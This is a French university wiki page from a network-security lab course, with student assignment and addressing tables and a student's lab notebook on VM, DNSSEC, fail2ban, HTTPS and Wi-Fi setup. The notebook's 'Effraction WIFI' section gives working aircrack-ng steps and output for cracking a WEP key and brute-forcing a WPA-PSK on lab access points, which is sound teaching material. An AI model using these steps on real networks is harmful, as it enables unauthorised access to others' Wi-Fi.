wiki-se.plil.fr - Contributions [fr]

SE4 IdO sécurité système/réseau 2025/2026

2026-03-03T22:21:50Z

Abiernac :

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
!numéro de binôme
!Adresse IPV4 OpenWRT
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|1
|193.48.57.177
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|
|
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|3
|193.48.57.180
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|4
|193.48.57.178
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|5
|193.48.57.181
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|7
|193.48.57.182
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|6
|193.48.57.179
|-
| SE4.Solstice|| 193.48.57.167|| Mohamed Salhi
|2
|193.48.57.173
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|Styx
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E13-Billel
|23
|-
|E14-Antonin
|24
|-
|E15-MSalhi
|25
|-
|E11-Evora
|28
|-
|E12-Gauthier
|21
|-
|E8-Yassine
|18
|-
|E7-Ibrahim
|17
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCedric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolBillel
|<code>10.60.13.0/24</code>
|2001:660:4401:60ad::/64
|-
|PoolAurele
|<code>10.60.9.0/24</code>
|2001:660:4401:60a9::/64
|-
|PoolTom
|<code>10.60.10.0/24</code>
|2001:660:4401:60aa::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|-
|PoolAntonin
|<code>10.60.14.0/24</code>
|2001:660:4401:60ae::/64
|-
|PoolYassine
|10.60.8.0/24
|2001:660:4401:60a8::/64
|-
|PoolEvora
|10.60.11.0/24
|2001:660:4401:60ab::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:52:30Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS et DNSSEC ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Sécurisation WiFi par WPA2-EAP ==

=== Partie VLAN ===

Depuis la machine batman on se '''ssh sur le routeur''' via cette commande :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

'''Création du Vlan24''' avec le nom PoolAntonin :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour configurer le '''vlan''' que nous venons de créer ainsi que le '''VRRP''' j'ai fait ceci : ('''/!\''' l'adresse IPv4 de votre vlan doit être mise dans le tableau commun sur le wiki afin d'éviter tout conflit avec une autre personne)<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

=== Partie WIFI ===

On peut exit enfin pour se ssh cette fois sur la partie '''wifi''' :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite les commandes suivantes, inspirées de celle du sujet, afin de configurer notre '''point d'accès wifi''' :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

Par le suite nous avons modifié plusieurs fichiers sans succès. Cette dernière partie est donc '''incomplète''' et ne permet pas de validé cette dernière.

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:36:04Z

Abiernac : /* DNS et DNSSEC */

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
